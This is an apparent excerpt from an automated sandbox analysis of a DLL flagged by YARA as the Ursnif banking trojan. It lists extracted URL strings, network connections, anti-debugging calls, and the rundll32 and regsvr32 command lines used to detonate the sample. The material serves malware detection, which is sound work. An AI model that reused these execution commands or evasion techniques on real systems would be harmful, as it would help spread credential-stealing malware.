                    Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/homepage/api/pdp/updatepdpdata&quot;
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/nachrichten/coronareisen
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/nachrichten/regional
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/26-j%c3%a4hriger-mann-stirbt-nach-sturz-auf-vorpla
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/eye-tracking-bei-online-pr%c3%bcfungen-keiner-%c3%
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/k%c3%b6nnen-seil-oder-hochbahnen-z%c3%bcrichs-verk
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/trotz-breiter-protestwelle-sollen-die-maag-hallen-
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/wer-bekommt-im-kanton-z%c3%bcrich-pr%c3%a4mienverb
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/berufung-zum-professor-ohne-doktortitel/ar-AAKEMiw?ocid=hplocal
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/der-singende-snowboader/ar-AAKFmIQ?ocid=hplocalnews
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/gr%c3%bcne-fordern-regierung-soll-zeitungen-f%c3%b6rdern/ar-AAK
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/junger-mann-stirbt-nach-sturz-von-einer-mauer-bei-der-eth/ar-AA
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/walt-disney-sprach-ihn-an-und-pl%c3%b6tzlich-stand-sein-leben-k
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/sport?ocid=StripeOCID
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com?form=MY01O4&OCID=MY01O4
                    Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=1
                    Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&amp;auth=1&amp;wdorigin=msn
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://www.ricardo.ch/?utm_source=msn&amp;utm_medium=affiliate&amp;utm_campaign=msn_mestripe_logo_d
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://www.ricardo.ch/?utm_source=msn&amp;utm_medium=affiliate&amp;utm_campaign=msn_shop_de&amp;utm
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://www.skype.com/
                    Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://www.skype.com/de
                    Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://www.skype.com/de/download-skype
                    Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://www.skyscanner.net/flights?associateid=API_B2B_19305_00001&amp;vertical=custom&amp;pageType=
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002
                    Source: iab2Data[1].json.6.drString found in binary or memory: https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json
                    Source: iab2Data[1].json.6.drString found in binary or memory: https://www.stroeer.de/konvergenz-konzepte/daten-technologien/stroeer-ssp/datenschutz-ssp.html
                    Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                    Source: unknownHTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.5:49717 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.5:49718 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49729 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49731 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49730 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49734 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49732 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49733 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing:

                    barindex
                    Yara detected UrsnifShow sources
                    Source: Yara matchFile source: 00000000.00000003.425497908.0000000001390000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.415227072.0000000000BE0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000003.422187658.0000000000CA0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000003.416030863.0000000003030000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5.3.rundll32.exe.ca8d03.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.loaddll32.exe.6ddf0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.regsvr32.exe.6ddf0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.rundll32.exe.6ddf0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.3.regsvr32.exe.3038d03.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.loaddll32.exe.1398d03.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.3.rundll32.exe.be8d03.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.rundll32.exe.6ddf0000.2.unpack, type: UNPACKEDPE

                    E-Banking Fraud:

                    barindex
                    Yara detected UrsnifShow sources
                    Source: Yara matchFile source: 00000000.00000003.425497908.0000000001390000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.415227072.0000000000BE0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000003.422187658.0000000000CA0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000003.416030863.0000000003030000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5.3.rundll32.exe.ca8d03.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.loaddll32.exe.6ddf0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.regsvr32.exe.6ddf0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.rundll32.exe.6ddf0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.3.regsvr32.exe.3038d03.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.loaddll32.exe.1398d03.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.3.rundll32.exe.be8d03.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.rundll32.exe.6ddf0000.2.unpack, type: UNPACKEDPE
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DDF2485 NtQueryVirtualMemory,0_2_6DDF2485
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6DDF2485 NtQueryVirtualMemory,2_2_6DDF2485
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DDF22640_2_6DDF2264
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DE352500_2_6DE35250
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DE45DE10_2_6DE45DE1
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DE45CC10_2_6DE45CC1
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DE476750_2_6DE47675
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DE3D8400_2_6DE3D840
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6DDF22642_2_6DDF2264
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6DE352502_2_6DE35250
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6DE45DE12_2_6DE45DE1
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6DE45CC12_2_6DE45CC1
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6DE3D8402_2_6DE3D840
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6DE476752_2_6DE47675
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6DE352503_2_6DE35250
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6DE45DE13_2_6DE45DE1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6DE45CC13_2_6DE45CC1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6DE476753_2_6DE47675
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6DE3D8403_2_6DE3D840
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6DE352505_2_6DE35250
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6DE45DE15_2_6DE45DE1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6DE45CC15_2_6DE45CC1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6DE476755_2_6DE47675
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6DE3D8405_2_6DE3D840
                    Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6DE37990 appears 37 times
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 6DE37990 appears 37 times
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6DE40930 appears 36 times
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6DE37990 appears 74 times
                    Source: racial.dllBinary or memory string: OriginalFilenameRoad.dll8 vs racial.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
                    Source: racial.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                    Source: racial.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: classification engineClassification label: mal56.troj.winDLL@13/121@9/2
                    Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{2E23CC91-C4E5-11EB-90E5-ECF4BB570DC9}.datJump to behavior
                    Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\~DFEA03D070EFE2E83F.TMPJump to behavior
                    Source: racial.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Program Files\internet explorer\iexplore.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\racial.dll',#1
                    Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\racial.dll'
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\racial.dll',#1
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\racial.dll
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\racial.dll',#1
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\racial.dll,DllRegisterServer
                    Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5932 CREDAT:17410 /prefetch:2
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\racial.dll',#1Jump to behavior
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\racial.dllJump to behavior
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exeJump to behavior
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\racial.dll,DllRegisterServerJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\racial.dll',#1Jump to behavior
                    Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5932 CREDAT:17410 /prefetch:2Jump to behavior
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
                    Source: racial.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                    Source: racial.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                    Source: racial.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                    Source: racial.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: racial.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                    Source: racial.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                    Source: racial.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                    Source: racial.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: c:\Steam\Egg\332\people\Spec\Road.pdb source: loaddll32.exe, 00000000.00000002.481246948.000000006DE49000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.481855502.000000006DE49000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.485085949.000000006DE49000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.481827060.000000006DE49000.00000002.00020000.sdmp, racial.dll
                    Source: racial.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                    Source: racial.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                    Source: racial.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                    Source: racial.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                    Source: racial.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DDF1F31 LoadLibraryA,GetProcAddress,0_2_6DDF1F31
                    Source: racial.dllStatic PE information: real checksum: 0x86142 should be: 0x82e0d
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\racial.dll
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DDF2253 push ecx; ret 0_2_6DDF2263
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DDF2200 push ecx; ret 0_2_6DDF2209
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DDFE541 push ebx; ret 0_2_6DDFE542
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DE00483 pushad ; ret 0_2_6DE00497
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DE017A4 push esp; ret 0_2_6DE017A5
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DE006D9 push ebp; retf 0_2_6DE006EC
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DE00681 push edi; ret 0_2_6DE00682
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DDFE18A push esp; ret 0_2_6DDFE18B
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DE0016F push esp; iretd 0_2_6DE001ED
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DDFF039 push ebx; retf 0_2_6DDFF08E
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DE01AED pushad ; ret 0_2_6DE01AF9
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6DDF2253 push ecx; ret 2_2_6DDF2263
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6DDF2200 push ecx; ret 2_2_6DDF2209
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6DDFE18A push esp; ret 2_2_6DDFE18B
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6DE0016F push esp; iretd 2_2_6DE001ED
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6DDFE541 push ebx; ret 2_2_6DDFE542
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6DE00483 pushad ; ret 2_2_6DE00497
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6DDFF039 push ebx; retf 2_2_6DDFF08E
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6DE017A4 push esp; ret 2_2_6DE017A5
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6DE01AED pushad ; ret 2_2_6DE01AF9
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6DE006D9 push ebp; retf 2_2_6DE006EC
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6DE00681 push edi; ret 2_2_6DE00682
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6DDFE541 push ebx; ret 3_2_6DDFE542
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6DE00483 pushad ; ret 3_2_6DE00497
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6DE017A4 push esp; ret 3_2_6DE017A5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6DE006D9 push ebp; retf 3_2_6DE006EC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6DE00681 push edi; ret 3_2_6DE00682
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6DDFE18A push esp; ret 3_2_6DDFE18B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6DE0016F push esp; iretd 3_2_6DE001ED
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6DDFF039 push ebx; retf 3_2_6DDFF08E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6DE01AED pushad ; ret 3_2_6DE01AF9

                    Hooking and other Techniques for Hiding and Protection:

                    barindex
                    Yara detected UrsnifShow sources
                    Source: Yara matchFile source: 00000000.00000003.425497908.0000000001390000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.415227072.0000000000BE0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000003.422187658.0000000000CA0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000003.416030863.0000000003030000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5.3.rundll32.exe.ca8d03.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.loaddll32.exe.6ddf0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.regsvr32.exe.6ddf0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.rundll32.exe.6ddf0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.3.regsvr32.exe.3038d03.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.loaddll32.exe.1398d03.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.3.rundll32.exe.be8d03.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.rundll32.exe.6ddf0000.2.unpack, type: UNPACKEDPE
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\loaddll32.exeLast function: Thread delayed
                    Source: C:\Windows\System32\loaddll32.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\regsvr32.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\regsvr32.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DE40D7A FindFirstFileExW,0_2_6DE40D7A
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6DE40D7A FindFirstFileExW,2_2_6DE40D7A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6DE40D7A FindFirstFileExW,3_2_6DE40D7A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6DE40D7A FindFirstFileExW,5_2_6DE40D7A
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DE3A5EE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6DE3A5EE
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DDF1F31 LoadLibraryA,GetProcAddress,0_2_6DDF1F31
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DE40947 mov eax, dword ptr fs:[00000030h]0_2_6DE40947
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DE3C28B mov eax, dword ptr fs:[00000030h]0_2_6DE3C28B
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DE723C3 mov eax, dword ptr fs:[00000030h]0_2_6DE723C3
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DE71F00 push dword ptr fs:[00000030h]0_2_6DE71F00
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DE722F9 mov eax, dword ptr fs:[00000030h]0_2_6DE722F9
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6DE40947 mov eax, dword ptr fs:[00000030h]2_2_6DE40947
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6DE3C28B mov eax, dword ptr fs:[00000030h]2_2_6DE3C28B
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6DE723C3 mov eax, dword ptr fs:[00000030h]2_2_6DE723C3
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6DE71F00 push dword ptr fs:[00000030h]2_2_6DE71F00
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6DE722F9 mov eax, dword ptr fs:[00000030h]2_2_6DE722F9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6DE40947 mov eax, dword ptr fs:[00000030h]3_2_6DE40947
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6DE3C28B mov eax, dword ptr fs:[00000030h]3_2_6DE3C28B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6DE723C3 mov eax, dword ptr fs:[00000030h]3_2_6DE723C3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6DE71F00 push dword ptr fs:[00000030h]3_2_6DE71F00
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6DE722F9 mov eax, dword ptr fs:[00000030h]3_2_6DE722F9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6DE40947 mov eax, dword ptr fs:[00000030h]5_2_6DE40947
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6DE3C28B mov eax, dword ptr fs:[00000030h]5_2_6DE3C28B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6DE723C3 mov eax, dword ptr fs:[00000030h]5_2_6DE723C3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6DE71F00 push dword ptr fs:[00000030h]5_2_6DE71F00
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6DE722F9 mov eax, dword ptr fs:[00000030h]5_2_6DE722F9
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DE3A5EE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6DE3A5EE
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DE379EB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6DE379EB
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DE37869 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6DE37869
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6DE379EB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_6DE379EB
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6DE3A5EE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6DE3A5EE
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6DE37869 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6DE37869
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6DE3A5EE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6DE3A5EE
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6DE379EB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6DE379EB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6DE37869 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6DE37869
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6DE3A5EE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_6DE3A5EE
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6DE379EB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_6DE379EB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6DE37869 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_6DE37869
